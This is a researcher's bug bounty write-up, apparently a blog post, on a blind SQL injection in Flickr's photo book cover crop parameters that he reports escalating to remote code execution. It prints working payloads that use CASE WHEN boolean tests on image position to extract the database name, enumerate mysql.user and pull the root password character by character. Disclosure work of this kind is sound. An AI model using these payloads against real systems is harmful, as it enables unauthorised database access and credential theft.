Today I talk about the best exploit for SQL injection vulnerability which I have found in Flickr. by the way there is another one ^_^.

Overview:

The impact analysis for this BSQLI is:
– Select from databases.
– Update and delete Tables.
– Get dba (root) password.
– Read and write files.
– Escalated to RCE.

Flickr give you ability to create a book, after you create a new book you can add “Front Cover Photo“. You can perform the following actions for cover photo:
– Change size
– Change position
– Zoom-in, Zoom-out
– Corp photo

All the above parameters affected for Blind SQL Injection

Let’s Start: 

1. Create new photo books, then edit it:

http://www.flickr.com/create/books/107355593/cover

2. Change cover photo position, zoom-in and zoom put (Just change photo settings) and capture the request.

3. Post request send to “http://api.flickr.com/services/rest” with the following data:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=0&crop_w=76&crop_h=52

4. For above business, I put my analysis about what happen in the code.First I have update query (DML) which used to update photo settings like (crop, zoom-in and zoom-out) then I assumed that the query is:

UPDATE TblPhotosSettings SET position=’1′, crop_x=’12’, crop_y=’0′, crop_w=’76’, crop_h=’52’ WHERE page_id=’107355603_1′ and photo_id=13137498255

5. After playing with the request, I didn’t find any change in the response. Maybe no SQLI here. but I decide to have a look again. I said this is update query(DML) maybe the response doesn’t have any change let’s check the cover photo page “http://www.flickr.com/create/books/107355593/cover“.

6. I found that image position changed according what I wrote before. what should i do now !!?

7. I depended on y location (crop_y) to know if payload true or false.

  The following query return true:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=0&crop_w=76&crop_h=52‘,crop_y=CASE WHEN 1=1 THEN ‘0’ ELSE ’50’ END,crop_w=’76

  The following query return false:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=0&crop_w=76&crop_h=52‘,crop_y=CASE WHEN 1=0 THEN ‘0’ ELSE ’50’ END,crop_w=’76

If the Image “y” location changed to be 0 then the query return “true” else image “y” location changed to 50 and this mean the query return false.

Wow I got an idea to indicate the True and False by using special image 🙂

8. I used the following image to know if query return true or false and to make injection easy for me:

9. Now I know that I have a real SQLI, So what I must do now let’s give Yahoo! proof of concept:

   To get length of database name: 

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=1&crop_w=76&crop_h=52‘,crop_y=CASE WHEN (SELECT length(database())) BETWEEN 12 and 17 THEN ‘0’ ELSE ’50’ END,crop_w=’76

10. After that, what the next to escalate your SQLI to give your self more privilege !!!?
    Yes, Your are right let’s check If MYSQL user is dba (root) or not.

 page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=1&crop_w=76&crop_h=52‘,crop_y=CASE WHEN (SELECT length((SELECT username FROM mysql.user limit 0,1))) > 0 THEN ‘0’ ELSE ’50’ END,crop_w=’76

   Then got the password of root user:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=1&crop_w=76&crop_h=52‘,crop_y=CASE WHEN ASCII(SUBSTRING((SELECT password FROM mysql.user limit 0,1),1,1)) > 60 THEN ‘0’ ELSE ’50’ END,crop_w=’76

11. Now by using above methodology, You can do what every you need, I started reading /etc/passwd then writing files in the server. I have full access to the server now 🙂

12. I escalated the BSQLI to RCE, I gave Yahoo! numbers of databases and tables which I have access to it, root(dba) username and password, 3 lines of /etc/passwd and created files in the temp folder as POC.

That was an amazing SQLI exploit which escalated to RCE for me in Flickr, after that I shocked when Yahoo! Committee team decide the minimum bounty (3000$) for SQLI that I have ever seen and the reason was this is the new process. I just need to add that I reported the vulnerability before the new process ^_^ 3 months ago. By the way thanks Yahoo! BB Team but it deserve at least x3 of current amount.

Note: Yahoo! paid $10000 for BSQLI to another guy and $15000 for SQLI to another guy too. But this one which is BSQLI like the first one $3000 only (I need to know the logic behind that).

Here is the proof of concept video

Thanks,
Mohamed Maati
@MSM_1st
www.sculptordev.com